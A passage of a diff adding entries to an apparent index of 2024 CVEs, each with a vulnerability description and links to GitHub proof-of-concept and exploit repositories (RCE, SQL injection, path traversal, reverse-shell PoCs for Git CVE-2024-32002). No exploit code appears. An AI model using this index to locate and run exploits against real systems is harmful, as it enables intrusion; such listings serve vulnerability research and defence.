+- [truonghuuphuc/CVE-2024-30491-Poc](https://github.com/truonghuuphuc/CVE-2024-30491-Poc)
+
+### CVE-2024-30614 (2024-04-12)
+
+An issue in Ametys CMS v4.5.0 and before allows attackers to obtain sensitive information via exposed resources to the error scope.
+
+
+- [Lucky-lm/CVE-2024-30614](https://github.com/Lucky-lm/CVE-2024-30614)
+
+### CVE-2024-30656 (2024-04-15)
+
+An issue in Fireboltt Dream Wristphone BSW202_FB_AAC_v2.0_20240110-20240110-1956 allows attackers to cause a Denial of Service (DoS) via a crafted deauth frame.
+
+
+- [Yashodhanvivek/Firebolt-wristphone-vulnerability](https://github.com/Yashodhanvivek/Firebolt-wristphone-vulnerability)
+
+### CVE-2024-30850 (2024-04-12)
+
+An issue in tiagorlampert CHAOS v5.0.1 allows a remote attacker to execute arbitrary code via the BuildClient function within client_service.go
+
+
+- [chebuya/CVE-2024-30850-chaos-rat-rce-poc](https://github.com/chebuya/CVE-2024-30850-chaos-rat-rce-poc)
+
+### CVE-2024-30851 (2024-05-03)
+
+Directory Traversal vulnerability in codesiddhant Jasmin Ransomware v.1.0.1 allows an attacker to obtain sensitive information via the download_file.php component.
+
+
+- [chebuya/CVE-2024-30851-jasmin-ransomware-path-traversal-poc](https://github.com/chebuya/CVE-2024-30851-jasmin-ransomware-path-traversal-poc)
+
+### CVE-2024-30896
+- [XenoM0rph97/CVE-2024-30896](https://github.com/XenoM0rph97/CVE-2024-30896)
+
+### CVE-2024-30956
+- [leoCottret/CVE-2024-30956](https://github.com/leoCottret/CVE-2024-30956)
+
+### CVE-2024-30973 (2024-05-06)
+
+An issue in V-SOL G/EPON ONU HG323AC-B with firmware version V2.0.08-210715 allows an attacker to execute arbtirary code and obtain sensitive information via crafted POST request to /boaform/getASPdata/formFirewall, /boaform/getASPdata/formAcc.
+
+
+- [Athos-Zago/CVE-2024-30973](https://github.com/Athos-Zago/CVE-2024-30973)
+
+### CVE-2024-30998 (2024-04-03)
+
+SQL Injection vulnerability in PHPGurukul Men Salon Management System v.2.0, allows remote attackers to execute arbitrary code and obtain sensitive information via the email parameter in the index.php component.
+
+
+- [efekaanakkar/CVE-2024-30998](https://github.com/efekaanakkar/CVE-2024-30998)
+
+### CVE-2024-31210 (2024-04-04)
+
+WordPress is an open publishing platform for the Web. It's possible for a file of a type other than a zip file to be submitted as a new plugin by an administrative user on the Plugins -> Add New -> Upload Plugin screen in WordPress. If FTP credentials are requested for installation (in order to move the file into place outside of the `uploads` directory) then the uploaded file remains temporary available in the Media Library despite it not being allowed. If the `DISALLOW_FILE_EDIT` constant is set to `true` on the site _and_ FTP credentials are required when uploading a new theme or plugin, then this technically allows an RCE when the user would otherwise have no means of executing arbitrary PHP code. This issue _only_ affects Administrator level users on single site installations, and Super Admin level users on Multisite installations where it's otherwise expected that the user does not have permission to upload or execute arbitrary PHP code. Lower level users are not affected. Sites where the `DISALLOW_FILE_MODS` constant is set to `true` are not affected. Sites where an administrative user either does not need to enter FTP credentials or they have access to the valid FTP credentials, are not affected. The issue was fixed in WordPress 6.4.3 on January 30, 2024 and backported to versions 6.3.3, 6.2.4, 6.1.5, 6.0.7, 5.9.9, 5.8.9, 5.7.11, 5.6.13, 5.5.14, 5.4.15, 5.3.17, 5.2.20, 5.1.18, 5.0.21, 4.9.25, 2.8.24, 4.7.28, 4.6.28, 4.5.31, 4.4.32, 4.3.33, 4.2.37, and 4.1.40. A workaround is available. If the `DISALLOW_FILE_MODS` constant is defined as `true` then it will not be possible for any user to upload a plugin and therefore this issue will not be exploitable.\n
+
+
+- [Abo5/CVE-2024-31210](https://github.com/Abo5/CVE-2024-31210)
+
+### CVE-2024-31351 (2024-05-17)
+
+Unrestricted Upload of File with Dangerous Type vulnerability in Copymatic Copymatic – AI Content Writer & Generator.This issue affects Copymatic – AI Content Writer & Generator: from n/a through 1.6.
+
+
+- [KTN1990/CVE-2024-31351_wordpress_exploit](https://github.com/KTN1990/CVE-2024-31351_wordpress_exploit)
+
+### CVE-2024-31497 (2024-04-15)
+
+In PuTTY 0.68 through 0.80 before 0.81, biased ECDSA nonce generation allows an attacker to recover a user's NIST P-521 secret key via a quick attack in approximately 60 signatures. This is especially important in a scenario where an adversary is able to read messages signed by PuTTY or Pageant. The required set of signed messages may be publicly readable because they are stored in a public Git service that supports use of SSH for commit signing, and the signatures were made by Pageant through an agent-forwarding mechanism. In other words, an adversary may already have enough signature information to compromise a victim's private key, even if there is no further use of vulnerable PuTTY versions. After a key compromise, an adversary may be able to conduct supply-chain attacks on software maintained in Git. A second, independent scenario is that the adversary is an operator of an SSH server to which the victim authenticates (for remote login or file copy), even though this server is not fully trusted by the victim, and the victim uses the same private key for SSH connections to other services operated by other entities. Here, the rogue server operator (who would otherwise have no way to determine the victim's private key) can derive the victim's private key, and then use it for unauthorized access to those other services. If the other services include Git services, then again it may be possible to conduct supply-chain attacks on software maintained in Git. This also affects, for example, FileZilla before 3.67.0, WinSCP before 6.3.3, TortoiseGit before 2.15.0.1, and TortoiseSVN through 1.14.6.
+
+
+- [sh1k4ku/CVE-2024-31497](https://github.com/sh1k4ku/CVE-2024-31497)
+- [edutko/cve-2024-31497](https://github.com/edutko/cve-2024-31497)
+- [HugoBond/CVE-2024-31497-POC](https://github.com/HugoBond/CVE-2024-31497-POC)
+
+### CVE-2024-31719
+- [VoltaireYoung/CVE-2024-31719----AMI-Aptio-5-Vulnerability](https://github.com/VoltaireYoung/CVE-2024-31719----AMI-Aptio-5-Vulnerability)
+
+### CVE-2024-31734
+- [HBLocker/CVE-2024-31734](https://github.com/HBLocker/CVE-2024-31734)
+
+### CVE-2024-31771 (-)
+
+Insecure Permission vulnerability in TotalAV v.6.0.740 allows a local attacker to escalate privileges via a crafted file
+
+
+- [restdone/CVE-2024-31771](https://github.com/restdone/CVE-2024-31771)
+
+### CVE-2024-31777 (2024-06-13)
+
+File Upload vulnerability in openeclass v.3.15 and before allows an attacker to execute arbitrary code via a crafted file to the certbadge.php endpoint.
+
+
+- [FreySolarEye/Exploit-CVE-2024-31777](https://github.com/FreySolarEye/Exploit-CVE-2024-31777)
+
+### CVE-2024-31819 (2024-04-10)
+
+An issue in WWBN AVideo v.12.4 through v.14.2 allows a remote attacker to execute arbitrary code via the systemRootPath parameter of the submitIndex.php component.
+
+
+- [Chocapikk/CVE-2024-31819](https://github.com/Chocapikk/CVE-2024-31819)
+- [Jhonsonwannaa/CVE-2024-31819](https://github.com/Jhonsonwannaa/CVE-2024-31819)
+
+### CVE-2024-31848 (2024-04-05)
+
+A path traversal vulnerability exists in the Java version of CData API Server < 23.4.8844 when running using the embedded Jetty server, which could allow an unauthenticated remote attacker to gain complete administrative access to the application.
+
+
+- [Stuub/CVE-2024-31848-PoC](https://github.com/Stuub/CVE-2024-31848-PoC)
+
+### CVE-2024-31974 (-)
+
+The com.solarized.firedown (aka Solarized FireDown Browser & Downloader) application 1.0.76 for Android allows a remote attacker to execute arbitrary JavaScript code via a crafted intent. com.solarized.firedown.IntentActivity uses a WebView component to display web content and doesn't adequately sanitize the URI or any extra data passed in the intent by any installed application (with no permissions).
+
+
+- [actuator/com.solarized.firedown](https://github.com/actuator/com.solarized.firedown)
+
+### CVE-2024-31982 (2024-04-10)
+
+XWiki Platform is a generic wiki platform. Starting in version 2.4-milestone-1 and prior to versions 4.10.20, 15.5.4, and 15.10-rc-1, XWiki's database search allows remote code execution through the search text. This allows remote code execution for any visitor of a public wiki or user of a closed wiki as the database search is by default accessible for all users. This impacts the confidentiality, integrity and availability of the whole XWiki installation. This vulnerability has been patched in XWiki 14.10.20, 15.5.4 and 15.10RC1. As a workaround, one may manually apply the patch to the page `Main.DatabaseSearch`. Alternatively, unless database search is explicitly used by users, this page can be deleted as this is not the default search interface of XWiki.
+
+
+- [k3lpi3b4nsh33/CVE-2024-31982](https://github.com/k3lpi3b4nsh33/CVE-2024-31982)
+- [th3gokul/CVE-2024-31982](https://github.com/th3gokul/CVE-2024-31982)
+- [bigb0x/CVE-2024-31982](https://github.com/bigb0x/CVE-2024-31982)
+
+### CVE-2024-32002 (2024-05-14)
+
+Git is a revision control system. Prior to versions 2.45.1, 2.44.1, 2.43.4, 2.42.2, 2.41.1, 2.40.2, and 2.39.4, repositories with submodules can be crafted in a way that exploits a bug in Git whereby it can be fooled into writing files not into the submodule's worktree but into a `.git/` directory. This allows writing a hook that will be executed while the clone operation is still running, giving the user no opportunity to inspect the code that is being executed. The problem has been patched in versions 2.45.1, 2.44.1, 2.43.4, 2.42.2, 2.41.1, 2.40.2, and 2.39.4. If symbolic link support is disabled in Git (e.g. via `git config --global core.symlinks false`), the described attack won't work. As always, it is best to avoid cloning repositories from untrusted sources.
+
+
+- [markuta/CVE-2024-32002](https://github.com/markuta/CVE-2024-32002)
+- [markuta/hooky](https://github.com/markuta/hooky)
+- [amalmurali47/git_rce](https://github.com/amalmurali47/git_rce)
+- [amalmurali47/hook](https://github.com/amalmurali47/hook)
+- [M507/CVE-2024-32002](https://github.com/M507/CVE-2024-32002)
+- [JakobTheDev/cve-2024-32002-submodule-rce](https://github.com/JakobTheDev/cve-2024-32002-submodule-rce)
+- [JakobTheDev/cve-2024-32002-poc-rce](https://github.com/JakobTheDev/cve-2024-32002-poc-rce)
+- [safebuffer/CVE-2024-32002](https://github.com/safebuffer/CVE-2024-32002)
+- [10cks/CVE-2024-32002-POC](https://github.com/10cks/CVE-2024-32002-POC)
+- [10cks/CVE-2024-32002-hulk](https://github.com/10cks/CVE-2024-32002-hulk)
+- [10cks/CVE-2024-32002-submod](https://github.com/10cks/CVE-2024-32002-submod)
+- [10cks/CVE-2024-32002-smash](https://github.com/10cks/CVE-2024-32002-smash)
+- [10cks/CVE-2024-32002-linux-hulk](https://github.com/10cks/CVE-2024-32002-linux-hulk)
+- [10cks/CVE-2024-32002-linux-submod](https://github.com/10cks/CVE-2024-32002-linux-submod)
+- [10cks/CVE-2024-32002-linux-smash](https://github.com/10cks/CVE-2024-32002-linux-smash)
+- [aitorcastel/poc_CVE-2024-32002](https://github.com/aitorcastel/poc_CVE-2024-32002)
+- [aitorcastel/poc_CVE-2024-32002_submodule](https://github.com/aitorcastel/poc_CVE-2024-32002_submodule)
+- [10cks/hook](https://github.com/10cks/hook)
+- [jweny/CVE-2024-32002_HOOK](https://github.com/jweny/CVE-2024-32002_HOOK)
+- [jweny/CVE-2024-32002_EXP](https://github.com/jweny/CVE-2024-32002_EXP)
+- [CrackerCat/CVE-2024-32002_EXP](https://github.com/CrackerCat/CVE-2024-32002_EXP)
+- [KiranKumarK20/CVE-2024-32002](https://github.com/KiranKumarK20/CVE-2024-32002)
+- [Roronoawjd/hook](https://github.com/Roronoawjd/hook)
+- [Roronoawjd/git_rce](https://github.com/Roronoawjd/git_rce)
+- [JJoosh/CVE-2024-32002-Reverse-Shell](https://github.com/JJoosh/CVE-2024-32002-Reverse-Shell)
+- [YuanlooSec/CVE-2024-32002-poc](https://github.com/YuanlooSec/CVE-2024-32002-poc)
+- [1mxml/CVE-2024-32002-poc](https://github.com/1mxml/CVE-2024-32002-poc)
+- [bfengj/CVE-2024-32002-hook](https://github.com/bfengj/CVE-2024-32002-hook)
+- [ycdxsb/CVE-2024-32002-hulk](https://github.com/ycdxsb/CVE-2024-32002-hulk)
+- [ycdxsb/CVE-2024-32002-submod](https://github.com/ycdxsb/CVE-2024-32002-submod)
+- [bfengj/CVE-2024-32002-Exploit](https://github.com/bfengj/CVE-2024-32002-Exploit)
+- [Hector65432/cve-2024-32002-1](https://github.com/Hector65432/cve-2024-32002-1)
+- [Hector65432/cve-2024-32002-2](https://github.com/Hector65432/cve-2024-32002-2)
+- [vincepsh/CVE-2024-32002](https://github.com/vincepsh/CVE-2024-32002)
+- [vincepsh/CVE-2024-32002-hook](https://github.com/vincepsh/CVE-2024-32002-hook)
+- [10cks/CVE-2024-32002-EXP](https://github.com/10cks/CVE-2024-32002-EXP)
+- [WOOOOONG/CVE-2024-32002](https://github.com/WOOOOONG/CVE-2024-32002)
+- [WOOOOONG/hook](https://github.com/WOOOOONG/hook)
+- [fadhilthomas/poc-cve-2024-32002](https://github.com/fadhilthomas/poc-cve-2024-32002)
+- [fadhilthomas/hook](https://github.com/fadhilthomas/hook)
+- [JakobTheDev/cve-2024-32002-submodule-aw](https://github.com/JakobTheDev/cve-2024-32002-submodule-aw)
+- [JakobTheDev/cve-2024-32002-poc-aw](https://github.com/JakobTheDev/cve-2024-32002-poc-aw)
+- [Goplush/CVE-2024-32002-git-rce](https://github.com/Goplush/CVE-2024-32002-git-rce)
+- [431m/rcetest](https://github.com/431m/rcetest)
+- [AD-Appledog/CVE-2024-32002](https://github.com/AD-Appledog/CVE-2024-32002)
+- [AD-Appledog/wakuwaku](https://github.com/AD-Appledog/wakuwaku)
+- [tobelight/cve_2024_32002](https://github.com/tobelight/cve_2024_32002)
+- [Basyaact/CVE-2024-32002-PoC_Chinese](https://github.com/Basyaact/CVE-2024-32002-PoC_Chinese)
+- [bonnettheo/CVE-2024-32002](https://github.com/bonnettheo/CVE-2024-32002)
+
+### CVE-2024-32004 (2024-05-14)
+
+Git is a revision control system. Prior to versions 2.45.1, 2.44.1, 2.43.4, 2.42.2, 2.41.1, 2.40.2, and 2.39.4, an attacker can prepare a local repository in such a way that, when cloned, will execute arbitrary code during the operation. The problem has been patched in versions 2.45.1, 2.44.1, 2.43.4, 2.42.2, 2.41.1, 2.40.2, and 2.39.4. As a workaround, avoid cloning repositories from untrusted sources.
+
+
+- [Wadewfsssss/CVE-2024-32004](https://github.com/Wadewfsssss/CVE-2024-32004)
+- [10cks/CVE-2024-32004-POC](https://github.com/10cks/CVE-2024-32004-POC)
+
+### CVE-2024-32030 (2024-06-19)
+
+Kafka UI is an Open-Source Web UI for Apache Kafka Management. Kafka UI API allows users to connect to different Kafka brokers by specifying their network address and port. As a separate feature, it also provides the ability to monitor the performance of Kafka brokers by connecting to their JMX ports. JMX is based on the RMI protocol, so it is inherently susceptible to deserialization attacks. A potential attacker can exploit this feature by connecting Kafka UI backend to its own malicious broker. This vulnerability affects the deployments where one of the following occurs: 1. dynamic.config.enabled property is set in settings. It's not enabled by default, but it's suggested to be enabled in many tutorials for Kafka UI, including its own README.md. OR 2. an attacker has access to the Kafka cluster that is being connected to Kafka UI. In this scenario the attacker can exploit this vulnerability to expand their access and execute code on Kafka UI as well. Instead of setting up a legitimate JMX port, an attacker can create an RMI listener that returns a malicious serialized object for any RMI call. In the worst case it could lead to remote code execution as Kafka UI has the required gadget chains in its classpath. This issue may lead to post-auth remote code execution. This is particularly dangerous as Kafka-UI does not have authentication enabled by default. This issue has been addressed in version 0.7.2. All users are advised to upgrade. There are no known workarounds for this vulnerability. These issues were discovered and reported by the GitHub Security lab and is also tracked as GHSL-2023-230.
+
+
+- [huseyinstif/CVE-2024-32030-Nuclei-Template](https://github.com/huseyinstif/CVE-2024-32030-Nuclei-Template)
+
+### CVE-2024-32113 (2024-05-08)
+
+Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal') vulnerability in Apache OFBiz.This issue affects Apache OFBiz: before 18.12.13.\n\nUsers are recommended to upgrade to version 18.12.13, which fixes the issue.\n\n
+
+
+- [Mr-xn/CVE-2024-32113](https://github.com/Mr-xn/CVE-2024-32113)
+
+### CVE-2024-32136 (2024-04-15)
+
+Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in Xenioushk BWL Advanced FAQ Manager.This issue affects BWL Advanced FAQ Manager: from n/a through 2.0.3.\n\n
+
+
+- [xbz0n/CVE-2024-32136](https://github.com/xbz0n/CVE-2024-32136)
+
+### CVE-2024-32205
+- [Lucky-lm/CVE-2024-32205](https://github.com/Lucky-lm/CVE-2024-32205)
+
+### CVE-2024-32238 (2024-04-22)
+
+H3C ER8300G2-X is vulnerable to Incorrect Access Control. The password for the router's management system can be accessed via the management system page login interface.
+
+
+- [asdfjkl11/CVE-2024-32238](https://github.com/asdfjkl11/CVE-2024-32238)
+- [FuBoLuSec/CVE-2024-32238](https://github.com/FuBoLuSec/CVE-2024-32238)
+
+### CVE-2024-32258 (2024-04-23)
+
+The network server of fceux 2.7.0 has a path traversal vulnerability, allowing attackers to overwrite any files on the server without authentication by fake ROM.
+
+
+- [liyansong2018/CVE-2024-32258](https://github.com/liyansong2018/CVE-2024-32258)
+
+### CVE-2024-32369 (2024-05-07)
+
+SQL Injection vulnerability in HSC Cybersecurity HC Mailinspector 5.2.17-3 through 5.2.18 allows a remote attacker to obtain sensitive information via a crafted payload to the start and limit parameter in the mliWhiteList.php component.
+
+
+- [chucrutis/CVE-2024-32369](https://github.com/chucrutis/CVE-2024-32369)
+
+### CVE-2024-32370 (2024-05-07)
+
+An issue in HSC Cybersecurity HC Mailinspector 5.2.17-3 through 5.2.18 allows a remote attacker to obtain sensitive information via a crafted payload to the id parameter in the mliSystemUsers.php component.
+
+
+- [chucrutis/CVE-2024-32370](https://github.com/chucrutis/CVE-2024-32370)
+
+### CVE-2024-32371 (2024-05-07)
+
+An issue in HSC Cybersecurity HC Mailinspector 5.2.17-3 through 5.2.18 allows a regular user account to escalate their privileges and gain administrative access by changing the type parameter from 1 to 0.
+
+
+- [chucrutis/CVE-2024-32371](https://github.com/chucrutis/CVE-2024-32371)
+
+### CVE-2024-32399 (2024-04-22)
+
+Directory Traversal vulnerability in RaidenMAILD Mail Server v.4.9.4 and before allows a remote attacker to obtain sensitive information via the /webeditor/ component.
+
+
+- [NN0b0dy/CVE-2024-32399](https://github.com/NN0b0dy/CVE-2024-32399)
+
+### CVE-2024-32459 (2024-04-22)
+
+FreeRDP is a free implementation of the Remote Desktop Protocol. FreeRDP based clients and servers that use a version of FreeRDP prior to 3.5.0 or 2.11.6 are vulnerable to out-of-bounds read. Versions 3.5.0 and 2.11.6 patch the issue. No known workarounds are available.
+
+
+- [absholi7ly/FreeRDP-Out-of-Bounds-Read-CVE-2024-32459-](https://github.com/absholi7ly/FreeRDP-Out-of-Bounds-Read-CVE-2024-32459-)
+
+### CVE-2024-32523 (2024-05-17)
+
+Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal') vulnerability in EverPress Mailster allows PHP Local File Inclusion.This issue affects Mailster: from n/a through 4.0.6.
+
+
+- [truonghuuphuc/CVE-2024-32523-Poc](https://github.com/truonghuuphuc/CVE-2024-32523-Poc)
+
+### CVE-2024-32640
+- [Stuub/CVE-2024-32640-SQLI-MuraCMS](https://github.com/Stuub/CVE-2024-32640-SQLI-MuraCMS)
+- [0x3f3c/CVE-2024-32640-SQLI-MuraCMS](https://github.com/0x3f3c/CVE-2024-32640-SQLI-MuraCMS)
+- [sammings/CVE-2024-32640](https://github.com/sammings/CVE-2024-32640)
+
+### CVE-2024-32651 (2024-04-25)
+
+changedetection.io is an open source web page change detection, website watcher, restock monitor and notification service. There is a Server Side Template Injection (SSTI) in Jinja2 that allows Remote Command Execution on the server host. Attackers can run any system command without any restriction and they could use a reverse shell. The impact is critical as the attacker can completely takeover the server machine. This can be reduced if changedetection is behind a login page, but this isn't required by the application (not by default and not enforced).
+
+
+- [zcrosman/cve-2024-32651](https://github.com/zcrosman/cve-2024-32651)
+
+### CVE-2024-32709 (2024-04-24)
+
+Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in Plechev Andrey WP-Recall.This issue affects WP-Recall: from n/a through 16.26.5.\n\n
+
+
+- [truonghuuphuc/CVE-2024-32709-Poc](https://github.com/truonghuuphuc/CVE-2024-32709-Poc)
+
+### CVE-2024-32766 (2024-04-26)
+
+An OS command injection vulnerability has been reported to affect several QNAP operating system versions. If exploited, the vulnerability could allow users to execute commands via a network.\n\nWe have already fixed the vulnerability in the following versions:\nQTS 5.1.3.2578 build 20231110 and later\nQTS 4.5.4.2627 build 20231225 and later\nQuTS hero h5.1.3.2578 build 20231110 and later\nQuTS hero h4.5.4.2626 build 20231225 and later\nQuTScloud c5.1.5.2651 and later\n
+
+
+- [3W1nd4r/CVE-2024-32766-RCE](https://github.com/3W1nd4r/CVE-2024-32766-RCE)
+
+### CVE-2024-33078 (2024-05-01)
+
+Tencent Libpag v4.3 is vulnerable to Buffer Overflow. A user can send a crafted image to trigger a overflow leading to remote code execution.
+
+
+- [HBLocker/CVE-2024-33078](https://github.com/HBLocker/CVE-2024-33078)
+
+### CVE-2024-33111 (2024-05-06)
+
+D-Link DIR-845L router <=v1.01KRb03 is vulnerable to Cross Site Scripting (XSS) via /htdocs/webinc/js/bsc_sms_inbox.php.
+
+
+- [FaLLenSKiLL1/CVE-2024-33111](https://github.com/FaLLenSKiLL1/CVE-2024-33111)
+
+### CVE-2024-33113 (2024-05-06)
+
+D-LINK DIR-845L <=v1.01KRb03 is vulnerable to Information disclosurey via bsc_sms_inbox.php.
+
+
+- [FaLLenSKiLL1/CVE-2024-33113](https://github.com/FaLLenSKiLL1/CVE-2024-33113)
+- [tekua/CVE-2024-33113](https://github.com/tekua/CVE-2024-33113)
+
+### CVE-2024-33438 (2024-04-29)
+
+File Upload vulnerability in CubeCart before 6.5.5 allows an authenticated user to execute arbitrary code via a crafted .phar file.
+
+
+- [julio-cfa/CVE-2024-33438](https://github.com/julio-cfa/CVE-2024-33438)
+
+### CVE-2024-33559 (2024-04-29)
+
+Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in 8theme XStore allows SQL Injection.This issue affects XStore: from n/a through 9.3.5.\n\n
+
+
+- [absholi7ly/WordPress-XStore-theme-SQL-Injection](https://github.com/absholi7ly/WordPress-XStore-theme-SQL-Injection)
+
+### CVE-2024-33722
+- [fuzzlove/soplanning-1.52-exploits](https://github.com/fuzzlove/soplanning-1.52-exploits)
+
+### CVE-2024-33775 (2024-05-01)
+
+An issue with the Autodiscover component in Nagios XI 2024R1.01 allows a remote attacker to escalate privileges via a crafted Dashlet.
+
+
+- [Neo-XeD/CVE-2024-33775](https://github.com/Neo-XeD/CVE-2024-33775)
+
+### CVE-2024-33883 (2024-04-28)
+
+The ejs (aka Embedded JavaScript templates) package before 3.1.10 for Node.js lacks certain pollution protection.
+
+
+- [Grantzile/PoC-CVE-2024-33883](https://github.com/Grantzile/PoC-CVE-2024-33883)
+
+### CVE-2024-33911 (2024-05-02)
+
+Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in Weblizar School Management Pro.This issue affects School Management Pro: from n/a through 10.3.4.\n\n
+
+
+- [xbz0n/CVE-2024-33911](https://github.com/xbz0n/CVE-2024-33911)
+
+### CVE-2024-34220 (-)
+
+Sourcecodester Human Resource Management System 1.0 is vulnerable to SQL Injection via the 'leave' parameter.
+
+
+- [dovankha/CVE-2024-34220](https://github.com/dovankha/CVE-2024-34220)
+
+### CVE-2024-34221 (-)
+
+Sourcecodester Human Resource Management System 1.0 is vulnerable to Insecure Permissions resulting in privilege escalation.
+
+
+- [dovankha/CVE-2024-34221](https://github.com/dovankha/CVE-2024-34221)
+
+### CVE-2024-34222 (-)
+
+Sourcecodester Human Resource Management System 1.0 is vulnerable to SQL Injection via the searccountry parameter.
+
+
+- [dovankha/CVE-2024-34222](https://github.com/dovankha/CVE-2024-34222)
+
+### CVE-2024-34223 (-)
+
+Insecure permission vulnerability in /hrm/leaverequest.php in SourceCodester Human Resource Management System 1.0 allow attackers to approve or reject leave ticket.
+
+
+- [dovankha/CVE-2024-34223](https://github.com/dovankha/CVE-2024-34223)
+
+### CVE-2024-34224 (-)
+
+Cross Site Scripting vulnerability in /php-lms/classes/Users.php?f=save in Computer Laboratory Management System using PHP and MySQL 1.0 allow remote attackers to inject arbitrary web script or HTML via the firstname, middlename, lastname parameters.
+
+
+- [dovankha/CVE-2024-34224](https://github.com/dovankha/CVE-2024-34224)
+
+### CVE-2024-34225 (-)
+
+Cross Site Scripting vulnerability in php-lms/admin/?page=system_info in Computer Laboratory Management System using PHP and MySQL 1.0 allow remote attackers to inject arbitrary web script or HTML via the name, shortname parameters.
+
+
+- [dovankha/CVE-2024-34225](https://github.com/dovankha/CVE-2024-34225)
+
+### CVE-2024-34226 (-)
+
+SQL injection vulnerability in /php-sqlite-vms/?page=manage_visitor&id=1 in SourceCodester Visitor Management System 1.0 allow attackers to execute arbitrary SQL commands via the id parameters.
+
+
+- [dovankha/CVE-2024-34226](https://github.com/dovankha/CVE-2024-34226)
+
+### CVE-2024-34310 (-)
+
+Jin Fang Times Content Management System v3.2.3 was discovered to contain a SQL injection vulnerability via the id parameter.
+
+
+- [3309899621/CVE-2024-34310](https://github.com/3309899621/CVE-2024-34310)
+
+### CVE-2024-34312 (2024-06-24)
+
+Virtual Programming Lab for Moodle up to v4.2.3 was discovered to contain a cross-site scripting (XSS) vulnerability via the component vplide.js.
+
+
+- [vincentscode/CVE-2024-34312](https://github.com/vincentscode/CVE-2024-34312)
+
+### CVE-2024-34313 (2024-06-24)
+
+An issue in VPL Jail System up to v4.0.2 allows attackers to execute a directory traversal via a crafted request to a public endpoint.
+
+
+- [vincentscode/CVE-2024-34313](https://github.com/vincentscode/CVE-2024-34313)
+
+### CVE-2024-34351 (2024-05-09)
+
+Next.js is a React framework that can provide building blocks to create web applications. A Server-Side Request Forgery (SSRF) vulnerability was identified in Next.js Server Actions. If the `Host` header is modified, and the below conditions are also met, an attacker may be able to make requests that appear to be originating from the Next.js application server itself. The required conditions are 1) Next.js is running in a self-hosted manner; 2) the Next.js application makes use of Server Actions; and 3) the Server Action performs a redirect to a relative path which starts with a `/`. This vulnerability was fixed in Next.js `14.1.1`.
+
+
+- [Voorivex/CVE-2024-34351](https://github.com/Voorivex/CVE-2024-34351)
+
+### CVE-2024-34452 (2024-06-21)
+
+CMSimple_XH 1.7.6 allows XSS by uploading a crafted SVG document.
+
+
+- [surajhacx/CVE-2024-34452](https://github.com/surajhacx/CVE-2024-34452)
+
+### CVE-2024-34469 (2024-05-04)
+
+Rukovoditel before 3.5.3 allows XSS via user_photo to index.php?module=users/registration&action=save.
+
+
+- [Toxich4/CVE-2024-34469](https://github.com/Toxich4/CVE-2024-34469)
+
+### CVE-2024-34470 (2024-05-06)
+
+An issue was discovered in HSC Mailinspector 5.2.17-3 through v.5.2.18. An Unauthenticated Path Traversal vulnerability exists in the /public/loader.php file. The path parameter does not properly filter whether the file and directory passed are part of the webroot, allowing an attacker to read arbitrary files on the server.
+
+
+- [osvaldotenorio/CVE-2024-34470](https://github.com/osvaldotenorio/CVE-2024-34470)
+- [bigb0x/CVE-2024-34470](https://github.com/bigb0x/CVE-2024-34470)
+- [Cappricio-Securities/CVE-2024-34470](https://github.com/Cappricio-Securities/CVE-2024-34470)
+- [Mr-r00t11/CVE-2024-34470](https://github.com/Mr-r00t11/CVE-2024-34470)
+- [th3gokul/CVE-2024-34470](https://github.com/th3gokul/CVE-2024-34470)
+
+### CVE-2024-34471 (2024-05-06)
+
+An issue was discovered in HSC Mailinspector 5.2.17-3. A Path Traversal vulnerability (resulting in file deletion) exists in the mliRealtimeEmails.php file. The filename parameter in the export HTML functionality does not properly validate the file location, allowing an attacker to read and delete arbitrary files on the server. This was observed when the mliRealtimeEmails.php file itself was read and subsequently deleted, resulting in a 404 error for the file and disruption of email information loading.
+
+
+- [osvaldotenorio/CVE-2024-34471](https://github.com/osvaldotenorio/CVE-2024-34471)
+
+### CVE-2024-34472 (2024-05-06)
+
+An issue was discovered in HSC Mailinspector 5.2.17-3 through v.5.2.18. An authenticated blind SQL injection vulnerability exists in the mliRealtimeEmails.php file. The ordemGrid parameter in a POST request to /mailinspector/mliRealtimeEmails.php does not properly sanitize input, allowing an authenticated attacker to execute arbitrary SQL commands, leading to the potential disclosure of the entire application database.
+
+
+- [osvaldotenorio/CVE-2024-34472](https://github.com/osvaldotenorio/CVE-2024-34472)
+
+### CVE-2024-34474 (2024-05-05)
+
+Clario through 2024-04-11 for Desktop has weak permissions for %PROGRAMDATA%\Clario and tries to load DLLs from there as SYSTEM.
+
+
+- [Alaatk/CVE-2024-34474](https://github.com/Alaatk/CVE-2024-34474)
+
+### CVE-2024-34582 (-)
+
+Sunhillo SureLine through 8.10.0 on RICI 5000 devices allows cgi/usrPasswd.cgi userid_change XSS within the Forgot Password feature.
+
+
+- [silent6trinity/CVE-2024-34582](https://github.com/silent6trinity/CVE-2024-34582)
+
+### CVE-2024-34716 (2024-05-14)
+
+PrestaShop is an open source e-commerce web application. A cross-site scripting (XSS) vulnerability that only affects PrestaShops with customer-thread feature flag enabled is present starting from PrestaShop 8.1.0 and prior to PrestaShop 8.1.6. When the customer thread feature flag is enabled through the front-office contact form, a hacker can upload a malicious file containing an XSS that will be executed when an admin opens the attached file in back office. The script injected can access the session and the security token, which allows it to perform any authenticated action in the scope of the administrator's right. This vulnerability is patched in 8.1.6. A workaround is to disable the customer-thread feature-flag.
+
+
+- [aelmokhtar/CVE-2024-34716_PoC](https://github.com/aelmokhtar/CVE-2024-34716_PoC)
+
+### CVE-2024-34832 (-)
+
+Directory Traversal vulnerability in CubeCart v.6.5.5 and before allows an attacker to execute arbitrary code via a crafted file uploaded to the _g and node parameters.
+
+
+- [julio-cfa/CVE-2024-34832](https://github.com/julio-cfa/CVE-2024-34832)
+
+### CVE-2024-34958 (-)
+
+idccms v1.35 was discovered to contain a Cross-Site Request Forgery (CSRF) via the component admin/banner_deal.php?mudi=add
+
+
+- [Gr-1m/CVE-2024-34958](https://github.com/Gr-1m/CVE-2024-34958)
+
+### CVE-2024-35315
+- [ewilded/CVE-2024-35315-POC](https://github.com/ewilded/CVE-2024-35315-POC)
+
+### CVE-2024-35333 (-)
+
